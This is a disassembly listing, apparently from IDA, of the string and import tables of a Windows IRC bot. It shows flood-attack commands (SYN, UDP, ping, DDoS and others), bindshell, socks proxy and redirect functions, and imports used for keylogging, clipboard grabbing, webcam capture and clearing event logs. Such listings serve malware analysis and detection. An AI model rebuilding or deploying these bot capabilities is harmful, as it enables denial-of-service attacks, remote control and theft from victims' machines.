; char aTrstats[]
aTrstats db 'trstats',0 ; DATA XREF: sub_401ACD+1537�o
; char aTransferstats[]
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401ACD+1522�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_401ACD+150D�o
align 10h
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_401ACD+14F8�o
align 4
dword_42C70C dd 312C3803h, 4043532Dh, 2D4Eh ; DATA XREF: sub_401ACD+14ED�o
aScan db 'Scan',0 ; DATA XREF: sub_401ACD+14E8�o
align 10h
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_401ACD+14CF�o
align 4
dword_42C72C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401ACD+14C4�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_401ACD+14BF�o
align 4
; char aSecurestop[]
aSecurestop db 'securestop',0 ; DATA XREF: sub_401ACD+14A6�o
align 10h
dword_42C750 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401ACD+149B�o
aClone db 'Clone',0 ; DATA XREF: sub_401ACD+1496�o
align 4
; char aClonestop[]
aClonestop db 'clonestop',0 ; DATA XREF: sub_401ACD+147D�o
align 4
; char aPsstop[]
aPsstop db 'psstop',0 ; DATA XREF: sub_401ACD+1468�o
align 4
; char aProcsstop[]
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401ACD+1453�o
align 4
; char aFfstop[]
aFfstop db 'ffstop',0 ; DATA XREF: sub_401ACD+143E�o
align 10h
; char aFindfilestop[]
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401ACD+1429�o
align 10h
dword_42C7A0 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401ACD+141E�o
; char aTftpstop[]
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401ACD+1400�o
align 4
; char aPingstop[]
aPingstop db 'pingstop',0 ; DATA XREF: sub_401ACD+13D7�o
align 4
; char aUdpstop[]
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401ACD+13AE�o
; char aWisdomstop[]
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401ACD+1385�o
align 4
; char aTsunamistop[]
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401ACD+135C�o
unk_42C7E8 db 2Dh ; - ; DATA XREF: sub_401ACD+1342�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
dword_42C81C dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401ACD+1307�o
; sub_401ACD+13A3�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_401ACD+1302�o
; sub_401ACD+139E�o
align 4
dword_42C83C dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401ACD+12E9�o
; sub_401ACD+137A�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_401ACD+12E4�o
; sub_401ACD+1375�o
align 4
dword_42C85C dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401ACD+1289�o
; sub_401ACD+13F5�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_401ACD+1284�o
; sub_401ACD+13F0�o
align 4
dword_42C874 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401ACD+126B�o
; sub_401ACD+13CC�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_401ACD+1266�o
; sub_401ACD+13C7�o
align 4
; char aPacketstop[]
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401ACD+1206�o
align 4
dword_42C898 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401ACD+11FB�o
; sub_401ACD+12C8�o
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_401ACD+11F6�o
; sub_401ACD+12C3�o
align 10h
; char aWonkstop[]
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401ACD+11DD�o
align 4
dword_42C8BC dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401ACD+11D2�o
; sub_401ACD+12AA�o
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_401ACD+11CD�o
; sub_401ACD+12A5�o
align 4
; char aTarga3stop[]
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401ACD+11B4�o
align 4
dword_42C8E8 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401ACD+11A9�o
; sub_401ACD+1328�o
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_401ACD+11A4�o
; sub_401ACD+1323�o
align 4
; char aSkysynstop[]
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401ACD+118B�o
align 4
dword_42C914 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401ACD+1180�o
; sub_401ACD+124A�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_401ACD+117B�o
; sub_401ACD+1245�o
align 4
; char aSynstop[]
aSynstop db 'synstop',0 ; DATA XREF: sub_401ACD+1162�o
dword_42C934 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401ACD+1157�o
; sub_401ACD+122C�o
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_401ACD+1152�o
; sub_401ACD+1227�o
align 4
; char aDdos_stop[]
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_401ACD+1139�o
align 4
dword_42C958 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401ACD+112E�o
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_401ACD+1129�o
align 4
; char aRedirectstop[]
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401ACD+1110�o
align 4
dword_42C988 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401ACD+1105�o
aLogList db 'Log list',0 ; DATA XREF: sub_401ACD+1100�o
align 10h
; char aLogstop[]
aLogstop db 'logstop',0 ; DATA XREF: sub_401ACD+10E7�o
dword_42C9A8 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401ACD+10DC�o
; char aHttpstop[]
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401ACD+10BE�o
align 4
dword_42C9C4 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401ACD+10B3�o
; char aRloginstop[]
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401ACD+1095�o
align 10h
dword_42C9E0 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401ACD+108A�o
; char aSocks4stop[]
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401ACD+106C�o
align 4
; char aS4[]
aS4 db 's4',0 ; DATA XREF: sub_401ACD+1057�o
align 10h
; char aSocks4[]
aSocks4 db 'socks4',0 ; DATA XREF: sub_401ACD+1042�o
align 4
dword_42CA08 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401ACD+1037�o
aServer_0 db 'Server',0 ; DATA XREF: sub_401ACD+1032�o
; sub_401ACD+1085�o ...
align 4
; char aBindshellstop[]
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401ACD+1019�o
align 4
; char aBd[]
aBd db 'bd',0 ; DATA XREF: sub_401ACD+1004�o
align 4
; char aBindshell[]
aBindshell db 'bindshell',0 ; DATA XREF: sub_401ACD+FEF�o
align 4
; char aUnsec[]
aUnsec db 'unsec',0 ; DATA XREF: sub_401ACD+FDA�o
align 4
; char aUnsecure[]
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401ACD+FC5�o
align 4
; char aSec[]
aSec db 'sec',0 ; DATA XREF: sub_401ACD+FB0�o
; sub_401ACD+2D26�o
; char aSecure[]
aSecure db 'secure',0 ; DATA XREF: sub_401ACD+F9B�o
; sub_401ACD+2D15�o
align 4
; char aSt[]
aSt db 'st',0 ; DATA XREF: sub_401ACD+F86�o
align 4
; char aSpeedtest[]
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401ACD+F71�o
align 4
; char aRz[]
aRz db 'rz',0 ; DATA XREF: sub_401ACD+F5C�o
align 4
; char aRulez[]
aRulez db 'rulez',0 ; DATA XREF: sub_401ACD+F47�o
align 10h
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_401ACD+F32�o
; char aVersion[]
aVersion db 'version',0 ; DATA XREF: sub_401ACD+F1D�o
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_401ACD+F08�o
align 10h
; char aLogout[]
aLogout db 'logout',0 ; DATA XREF: sub_401ACD+EF3�o
align 4
; char aDi3[]
aDi3 db 'di3',0 ; DATA XREF: sub_401ACD+EC9�o
; sub_401ACD+EDE�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_401ACD+EB4�o
align 10h
; char aRndnick_0[]
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_401ACD+E9C�o
; char a63[]
a63 db '63',0 ; DATA XREF: sub_401ACD+D69�o
align 4
; char asc_42CAAC[]
asc_42CAAC: ; DATA XREF: sub_401ACD+D41�o
unicode 0, <)>,0
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_401ACD+D04�o
align 4
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_401ACD+CF9�o
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_401ACD+CE8�o
align 4
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_401ACD+CCC�o
align 4
; char aUser[]
aUser db '$user',0 ; DATA XREF: sub_401ACD+CBB�o
align 4
; char aMe[]
aMe db '$me',0 ; DATA XREF: sub_401ACD+CA9�o
; char aD_0[]
aD_0 db '$%d',0 ; DATA XREF: sub_401ACD+C3B�o
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_401ACD+B77�o
align 4
; char aK[]
aK: ; DATA XREF: sub_401ACD+A9F�o
; sub_401ACD+3DBC�o ...
unicode 0, <k>,0
; char aC[]
aC: ; DATA XREF: sub_401ACD+A87�o
; sub_401ACD+4AA4�o ...
unicode 0, <c>,0
unk_42CAF4 db 2Dh ; - ; DATA XREF: sub_401ACD+A64�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
unk_42CB28 db 2Dh ; - ; DATA XREF: sub_401ACD+A53�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_42CB58 db 2Dh ; - ; DATA XREF: sub_401ACD+A42�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_28 db '- Failed to start chat thread, error: <%d>.',0
align 10h
; char asc_42CB90[]
asc_42CB90 db '-' ; DATA XREF: sub_401ACD+9D3�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
; char aChat[]
aChat db 'CHAT',0 ; DATA XREF: sub_401ACD+93C�o
align 4
; char asc_42CBB8[]
asc_42CBB8 db '-' ; DATA XREF: sub_401ACD+91C�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
unk_42CBFC db 2Dh ; - ; DATA XREF: sub_401ACD+904�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_29 db '- Failed to start transfer thread, error: <%d>.',0
align 4
dword_42CC38 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401ACD+8F3�o
dd 0A0Dh
; char dword_42CC50
dword_42CC50 dd 4E495001h, 47h ; DATA XREF: sub_401ACD+8BF�o
dword_42CC58 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401ACD+8B4�o
dd 0D017325h, 0Ah
; char dword_42CC74
dword_42CC74 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401ACD+883�o
; char asc_42CC80[]
asc_42CC80 db '#',0 ; DATA XREF: sub_401ACD+7FA�o
; sub_40CD43+1B�o
align 4
; char asc_42CC84[]
asc_42CC84 db '-' ; DATA XREF: sub_401ACD+769�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
; char aS_6[]
aS_6 db '%s',0 ; DATA XREF: sub_401ACD+6EA�o
; sub_401ACD+979�o ...
align 4
; char aSend[]
aSend db 'SEND',0 ; DATA XREF: sub_401ACD+6C3�o
align 10h
; char dword_42CCC0
dword_42CCC0 dd 43434401h, 0 ; DATA XREF: sub_401ACD+6A5�o
; char a332[]
a332 db '332',0 ; DATA XREF: sub_401ACD+62F�o
; sub_401ACD+AC1�o ...
; char aNotice[]
aNotice db 'NOTICE',0 ; DATA XREF: sub_401ACD+60D�o
; sub_409869+F�o
align 4
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401ACD+601�o
; sub_409869+16�o
; char unk_42CCDC
unk_42CCDC db 3 ; DATA XREF: sub_401ACD+5B0�o
a81VrxUserSLo_0 db '8,1-VrX- User: %s logged out.',0
align 4
unk_42CCFC db 3 ; DATA XREF: sub_401ACD+590�o
a81VrxJoinedC_0 db '8,1-VrX- Joined channel: %s.',0
align 4
; char a353[]
a353 db '353',0 ; DATA XREF: sub_401ACD+55F�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401ACD+522�o
; sub_40F3AA+5C6�o
align 4
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_401ACD+511�o
; sub_401ACD+5CD�o
align 10h
; char aSS_1[]
aSS_1 db ':%s%s',0 ; DATA XREF: sub_401ACD+4EC�o
align 4
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_401ACD+3CE�o
align 10h
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+371�o
; sub_401ACD+5F1�o
; char unk_42CD50
unk_42CD50 db 3 ; DATA XREF: sub_401ACD+355�o
; sub_401ACD+2E79�o ...
a81VrxUserSLo_1 db '8,1-VrX- User %s logged out.',0
align 10h
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_401ACD+2E4�o
align 4
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+28D�o
; sub_401ACD+7A88�o ...
align 4
; char a433[]
a433 db '433',0 ; DATA XREF: sub_401ACD+262�o
; sub_417B76:loc_417BDE�o
; char a[]
a@: ; DATA XREF: sub_401ACD+23A�o
unicode 0, <@>,0
; char a302_0[]
a302_0 db '302',0 ; DATA XREF: sub_401ACD+22A�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_401ACD+215�o
; char a001[]
a001 db '001',0 ; DATA XREF: sub_401ACD+200�o
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1E4�o
; sub_401ACD+3BB�o ...
align 4
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C3�o
align 4
; char aPing[]
aPing db 'PING',0 ; DATA XREF: sub_401ACD+1A9�o
; sub_417B76+50�o
align 4
; char Delim[]
Delim: ; DATA XREF: sub_401ACD+19A�o
; sub_401ACD+7B9D�o
unicode 0, <!>,0
; char asc_42CDC0[]
asc_42CDC0: ; DATA XREF: sub_401ACD+A8�o
; sub_401ACD+E41�o ...
unicode 0, < >,0
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_401ACD+86�o
; sub_401ACD:loc_4025E6�o
align 4
; char aSSS_1[]
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409869+5D�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409909+C7F�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409909+C77�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409909:loc_40A573�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409909+C15�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409909+C08�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409909+BFB�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409909+BEE�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409909+BE1�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409909+BD9�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409909:loc_40A4D5�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409909+B97�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409909+B8F�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409909:loc_40A48B�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409909+B3D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409909+B30�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409909+B23�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409909+B1B�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409909:loc_40A417�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409909+AD9�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409909+AD1�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409909:loc_40A3CD�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409909+A8F�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409909+A87�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409909:loc_40A383�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409909+9F9�o
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409909+9EC�o
; sub_418AF1+65�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409909+9DF�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409909+9D2�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409909+9C5�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409909+9B8�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409909+9AB�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409909+99E�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409909+991�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409909+984�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409909+977�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409909+96F�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409909:loc_40A267�o
; sub_418AF1+58�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409909+921�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409909+914�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409909+90C�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409909:loc_40A208�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409909+8D2�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409909+860�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409909+853�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409909+846�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409909+839�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409909+82C�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409909+81F�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409909+812�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409909+805�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409909+7F8�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409909+7F0�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409909:loc_40A0E8�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409909+6A6�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409909+699�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409909+68C�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409909+67F�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_409909+672�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409909+665�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409909+658�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_409909+64B�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409909+63E�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_409909+631�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409909+629�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409909+617�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_409909+60A�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_409909+5FD�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409909+5E3�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_409909+5D6�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409909+5C9�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_409909+5BC�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409909+5AF�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409909+5A2�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_409909+595�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409909+588�o
aSocket db 'socket',0 ; DATA XREF: sub_409909+57B�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409909+56E�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409909+561�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409909+554�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409909+547�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409909+53A�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409909+52D�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409909+525�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409909+514�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409909+4A1�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409909+494�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409909+487�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409909+47A�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409909+46D�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409909+460�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409909+453�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409909+446�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409909+43E�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409909:loc_409D36�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409909:loc_409D0E�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409909+3AD�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409909+3A0�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409909+393�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409909+386�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409909+379�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409909+36C�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409909+35F�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409909:loc_409C60�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409909+327�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409909+31A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409909:loc_409C1B�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409909+2C6�o
align 4
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409909+2B9�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409909+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409909+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409909+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409909+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409909+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409909+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409909:loc_409B68�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409909+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409909+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409909+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409909:loc_409B01�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409909+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409909+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409909+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409909+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409909+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409909+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409909+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409909+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409909:loc_409A3E�o
; ___crtMessageBoxA+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409909:loc_409A11�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409909+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409909+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409909+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409909+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409909+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409909+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_409909+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409909+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409909+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409909+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409909+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409909+A�o
align 4
; char asc_42D6C4[]
asc_42D6C4 db '-' ; DATA XREF: sub_40A5C5+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
; char aAvicap32_dllFa[]
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+2CC�o
align 10h
; char aOdbc32_dllFail[]
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+298�o
; char aShell32_dllFai[]
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+264�o
align 4
; char aMpr32_dllFaile[]
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+230�o
align 4
; char aIphlpapi_dllFa[]
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+1FC�o
align 4
; char aDnsapi_dllFail[]
